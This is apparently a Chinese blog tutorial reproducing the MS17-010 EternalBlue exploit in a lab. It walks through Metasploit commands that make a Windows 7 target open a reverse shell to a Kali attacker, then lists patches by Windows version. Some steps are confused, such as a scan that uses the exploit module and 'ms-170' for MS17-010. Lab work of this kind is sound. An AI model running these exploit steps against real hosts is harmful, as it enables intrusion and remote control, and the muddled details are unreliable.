永恒之蓝漏洞复现（包括常见问题处理）和修复方案

本文讲解有关MS17-010永恒之蓝漏洞分析与复现

1.永恒之蓝简介

1、永恒之蓝介绍:
永恒之蓝漏洞MS17-010它的爆发源于 WannaCry 勒索病毒的诞生该病毒是不法分子利用NSANational Security Agency美国国家安全局泄露的漏洞 “EternalBlue”永恒之蓝进行改造而成 。勒索病毒的肆虐俨然是一场全球性互联网灾难给广大电脑用户造成了巨大损失。据统计全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。

2、漏洞原理
永恒之蓝漏洞通过 TCP 的445和139端口来利用 SMBv1 和 NBT 中的远程代码执行漏洞通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。

3、影响版本
目前已知受影响的 Windows 版本包括但不限于WindowsNTWindows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。
————————————————
版权声明本文为CSDN博主「未完成的歌~」的原创文章遵循CC 4.0 BY-SA版权协议转载请附上原文出处链接及本声明。
原文链接https://blog.csdn.net/qq_43531669/article/details/120375506

2.靶场环境准备

靶机windows 7 Service Pack1

攻击机Kali GNU/Linux Rolling

 

3.漏洞复现

1.检查靶机win7的防火墙是否关闭

 2.检查靶机win7开启远程桌面

3.开始攻击执行漏洞扫描包括探测445端口和扫描永恒之蓝ms-170漏洞 

可以看到ms170漏洞端口445目前是开启状态而永恒之蓝利用的就是445端口的SMB服务操作系统溢出漏洞。

 使用MSF的永恒之蓝漏洞模块对靶机进行扫描

打开MSFmsfconsole

搜索 ms17-010 代码search ms17_010

 

从扫描结果可以看出结果里得到一些工具其中
auxiliary/scanner/smb/smb_ms17_010          是永恒之蓝扫描模块 exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。
本次流程是先扫描探测漏洞然后进行漏洞利用。

使用ms-170进行漏洞扫描流程如下

1.使用模块use exploit/windows/smb/ms17_010_eternalblue

2.设置靶机ip set rhosts 192.168.3.121

3.设置靶机端口 set rport 445默认就是445如果nmap探测bios端口不是445的话请变更

 输入show options可查看配置

然后输入exploit或者run执行模块

 可以看到扫描结果中Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7601 

和靶场的操作系统是完全吻合的。

下一步漏洞利用使用ms17-010攻击模块对靶机进行攻击

之前使用的是扫描模块auxiliary/scanner/smb/smb_ms17_010

现在使用漏洞利用模块exploit/windows/smb/ms17_010_eternalblue

1.use exploit/windows/smb/ms17_010_eternalblue

 2.设置靶机ip和攻击机ip接收反弹的shell

set rhosts 192.168.3.121 靶机ip

set lhost 192.168.3.50  攻击机kali ip

set lport 903 攻击机kali 监听端口

 然后输入show option查看配置

执行攻击exploit 或 run

 可以看到已经在kali机上生成一个靶机的shell交互界面

输入ipconfig

 数字正常显示但是部分英文字符乱码此时输入chcp 65001 可解决乱码问题

 到此永恒之蓝漏洞复现完毕下一步可以进行内网渗透横向信息收集等

4.漏洞修复方案

1.关闭bios服务或开启防火墙屏蔽服务端口

2.给系统打上永恒之蓝的漏洞修复补丁

MS17010补丁列表
不同版本的操作系统对应的MS17-010补丁编号如下
winxp特别补丁KB4012598
winxp3 32位 Security Update for Windows XP SP3 (KB4012598)
winxp2 64位 Security Update for Windows XP SP2 for x64-based Systems (KB4012598)

win2003特别补丁KB4012598
2003SP2 32位 Security Update for Windows Server 2003 (KB4012598)
2003SP2 64位 Security Update for Windows Server 2003 for x64-based Systems (KB4012598)

win2008R2补丁 KB4012212、KB4012215
March, 2017 Security Only Quality Update for Windows Server 2008 R2 for x64-based Systems (KB4012212)
March, 2017 Security Monthly Quality Rollup for Windows Server 2008 R2 for x64-based Systems (KB4012215)

win7补丁 KB4012212、KB4012215
win7 32位
March, 2017 Security Only Quality Update for Windows 7 (KB4012212)
March, 2017 Security Monthly Quality Rollup for Windows 7 (KB4012215)
win7 64位
March, 2017 Security Only Quality Update for Windows 7 for x64-based Systems (KB4012212)
March, 2017 Security Monthly Quality Rollup for Windows 7 for x64-based Systems (KB4012215)

win10 1607补丁 KB4013429
win10 1607 32位
Cumulative Update for Windows 10 Version 1607 (KB4013429)
win10 1607 64位
Cumulative Update for Windows 10 Version 1607 for x64-based Systems (KB4013429)

win2012R2补丁 KB4012213、KB4012216
March, 2017 Security Only Quality Update for Windows Server 2012 R2 (KB4012213)
March, 2017 Security Monthly Quality Rollup for Windows Server 2012 R2 (KB4012216)

win2016补丁 KB4013429
Cumulative Update for Windows Server 2016 for x64-based Systems (KB4013429)